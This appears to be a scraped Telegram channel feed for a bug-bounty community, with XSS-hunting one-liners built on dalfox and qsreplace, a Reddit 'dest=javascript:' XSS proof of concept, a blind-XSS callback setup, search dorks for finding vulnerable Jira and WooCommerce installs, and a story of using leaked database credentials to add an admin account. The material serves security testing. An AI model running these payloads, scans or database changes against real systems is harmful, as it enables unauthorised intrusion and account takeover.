Brut Security
15.2K subscribers
967 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands๐Ÿ˜‰

Cleaned XSS Payload Hunting Commands:


1. Wayback + httpx + GF + Dalfox

cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done

2. Gospider + Dalfox

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe
3. Wayback + GF + Blind XSS via Dalfox

waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe


4. Gospider + Dalfox (Deep Crawl)

gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt
5. Dalfox Direct with Blind XSS

cat urls.txt | dalfox pipe -b yourdomain.xss



Required tools are:

httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox

If you find this helpful and want more cutting-edge tips and tricks, donโ€™t forget to follow me ๐Ÿ‘‰๐Ÿผ DarkShadow

#bugbountytips #xss
๐Ÿ”ฅ13๐Ÿ‘7๐Ÿ‘5๐Ÿ‘จโ€๐Ÿ’ป3
Which browser you use?
๐Ÿคฃ38๐Ÿ—ฟ9โค4๐Ÿ˜1
Good morning hacker's,
Let's start morning to hack Reddit account ๐Ÿ˜‰
๐Ÿ˜11๐Ÿซก2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!

Letโ€™s break it down and understand the logic behind the vulnerability.


Vulnerable Parameter: ?dest=

What does the dest parameter do?

The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:

A user tries to access a protected page.

Reddit redirects them to:
/login/?dest=/protected/resource

After login, the site redirects them to the original dest URL.

Sounds fine, right? But hereโ€™s the twist...


โœ… PoC Steps (Super Simple):

https://www.reddit.com/login/?dest=javascript:alert(document.domain)


Boom๐Ÿ’ฅ. Thatโ€™s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ€” just a mindset shift.


keep your payloads sharp and your eyes sharper.
Donโ€™t forget to react, share, and
follow me in X
๐Ÿ‘‰๐Ÿผ
DarkShadow

#bugbountytips #xss
๐Ÿ‘18๐Ÿ‘10๐Ÿ”ฅ7๐Ÿ—ฟ4โค2
Hey Hunter's,
DarkShadow here back again, dropping a killer trick ๐ŸŒ€

Before testing file upload vulnerability, test the filename parameter.

Don't forget to show your love, and follow me ๐Ÿ‘‰๐Ÿผ
DarkShadow
๐Ÿ”ฅ22๐Ÿ‘7โค3๐Ÿ‘3๐Ÿณ1๐Ÿ‘จโ€๐Ÿ’ป1๐Ÿซก1
โš ๏ธOrigin Recon: The Ultimate ASN & Origin Detection Toolโš ๏ธ

๐Ÿ”ฅFeatures-
โžก๏ธSubdomain extraction via Certificate Transparency (CRT.sh)
โžก๏ธDNS resolution with SSRF protection
โžก๏ธIP geolocation and ASN analysis
โžก๏ธCommon port scanning (80, 443, 22, etc.)
โžก๏ธCritical origin IP detection (non-CDN)

โœ”๏ธhttps://github.com/NazaninNazari/Origin_Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘19๐Ÿ”ฅ10
Forwarded from Brut Security 2.0
โ–ถ๏ธFresh BB Target - https://lormadetails.com/.well-known/security.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 ratingโ—๏ธ

The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/lVuft
๐Ÿ‘‰ Dork: http.meta:"content=\"JIRA\""

Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
๐Ÿ”ฅ6๐Ÿ‘2
โšก๏ธJust a heads-up โ€” BrutRecon Pro v2 is in the works.

๐Ÿ’ญStarting with clean domain scraping from bug bounty scope pages.

๐Ÿ”ฅNo noise. No junk.
The heavy recon features? Still cooking.

๐Ÿ’ฅStay tuned.

๐Ÿ”— addons.mozilla.org/addon/brutscope-extractor
Please open Telegram to view this post
VIEW IN TELEGRAM
โค24๐Ÿ‘5
๐Ÿ”ฅ uff is a custom ffuf fork that relies on modified net/http and net/url libraries to go beyond what regular ffuf can do.

https://github.com/sw33tLie/uff
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ9๐Ÿ‘3
โšก๏ธShrewdEye (sheye) is a set of utilities bundled into a single automated workflow to improve, simplify, and speed up resource discovery and vulnerabilities finding.

โœ”๏ธhttps://github.com/zzzteph/sheye
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ22โค10๐Ÿ‘5
Why there is no reactions๐Ÿ™‚?

Do let us know what content you guys looking for ๐Ÿ‘€
Please open Telegram to view this post
VIEW IN TELEGRAM
โค34๐Ÿ˜ข5๐Ÿ‘3๐Ÿค3๐Ÿ˜1
๐Ÿ”ฅ Tried something new! Just dropped a quick guide on rooting Android Emulator + setting up Burp Suite for HTTPS interception.

โœ… Manual setup
โœ… Magisk + rootAVD
โœ… Trusted Burp cert
โœ… Meme vibes included ๐Ÿ˜Ž

๐Ÿ“– Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
1๐Ÿ”ฅ23โค8
Hey Hunters,

DarkShadow here back againโ€”sorry for the delay, Iโ€™ve been a little sick. Please keep me in your prayers.

Anyway, just dropping a trick on how an out-of-scope target can lead to an in-scope critical vulnerability!

The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further whatโ€™s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.

But hereโ€™s the twistโ€”it was still showing the content from the original website I had requested. So I thought, maybe itโ€™s working like a proxy?

Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside itโ€”a config.php file.

Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessibleโ€”not just localhost!

I tried connectingโ€ฆ and boom! I was successfully connected.
But waitโ€”this domain is out of scope, right?

Thatโ€™s what I thought tooโ€ฆ until I started reading there massive database and was shockedโ€”
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.


At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly thatโ€”added an admin user to the database.

Now, on the target website, thereโ€™s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?

BOOM! ๐Ÿ’ฅ
It logged me into the admin dashboard.


And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.โœ…


So guys, if you enjoyed this method, donโ€™t forget to show some loveโ€”and please, pray for me, Iโ€™m really sick right now.

And donโ€™t forget to follow me on X (Twitter):
x.com/Darkshadow2bd

#bugbountytips #infosec
๐Ÿ‘20โค10๐Ÿ‘5๐Ÿ˜ฑ4
http://powerade.com.s3.amazonaws.com/index.html

guy's let's see whos explaination is better!

what is the impact after takeover a in-scop target S3 bucket?๐Ÿค”
๐Ÿ‘11๐Ÿ”ฅ5โค1๐Ÿ—ฟ1
Hey Hunter's,
DarkShadow here back again...
Dropping a new POC in WordPress plugin arbitrary administrator role user creation to broken authentication lead.

Before, don't forget to share and show your love guy's.
For more follow me on my X ๐Ÿ‘‰๐Ÿผ
DarkShadow
โค24๐Ÿ‘4๐Ÿ‘3
CVE-2025-47577: Unrestricted Upload of File with Dangerous Type in TI WooCommerce Wishlist Plugin, 10.0 rating ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ

Failure to check the types of uploaded files allows attackers to upload a web shell to the server and perform RCE.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/jYyss
๐Ÿ‘‰ Dork: http.body:"plugins/ti-woocommerce-wishlist"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ti-woocommerce-wishlist/ti-woocommerce-wishlist-292-unauthenticated-arbitrary-file-upload
๐Ÿ˜ฑ8โค4๐Ÿ‘2